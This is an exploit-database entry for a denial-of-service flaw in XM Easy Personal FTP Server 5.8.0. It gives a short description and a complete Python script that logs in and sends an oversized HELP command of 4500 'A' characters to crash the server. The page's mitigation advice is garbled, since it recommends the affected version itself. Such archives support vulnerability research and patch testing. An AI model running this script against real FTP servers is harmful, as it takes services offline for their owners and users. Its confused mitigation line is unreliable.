header-logo
Suggest Exploit
vendor:
XM Easy Personal FTP Server
by:
Pawan Lal
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: XM Easy Personal FTP Server
Affected Version From: 5.8.0
Affected Version To: 5.8.0
Patch Exists: YES
Related CWE: N/A
CPE: a:xm_ftp_server:xm_easy_personal_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP 3 EN
2016

XM Easy Personal FTP Server 5.8.0 (HELP) Denial of Service

This exploit is used to cause a denial of service attack on XM Easy Personal FTP Server 5.8.0. It sends a malicious HELP command with a buffer of 4500 A characters to the FTP server, causing it to crash.

Mitigation:

Ensure that the FTP server is running the latest version of XM Easy Personal FTP Server 5.8.0 and that all security patches are applied.
Source

Exploit-DB raw data:

#!/usr/bin/python
#XM Easy Personal FTP Server 5.8.0 (HELP) Denial of Service
#Tested on : Windows XP SP 3 EN
#Author : Pawan Lal   dxb.pawan@gmail.com
#Date : 18-02-2016
 
import socket
import sys
  
def Usage():
    print ("Usage: ./ftpxmftpdosbackup.py <FTP IP> <Username> <Password>\n")
buffer= "A" * 4500
def start(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] Evil Payload i.e buffer"
    sock.send("HELP %s\r\n" %buffer)
    sock.close()
  
if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    start(hostname,username,passwd)
    sys.exit(0)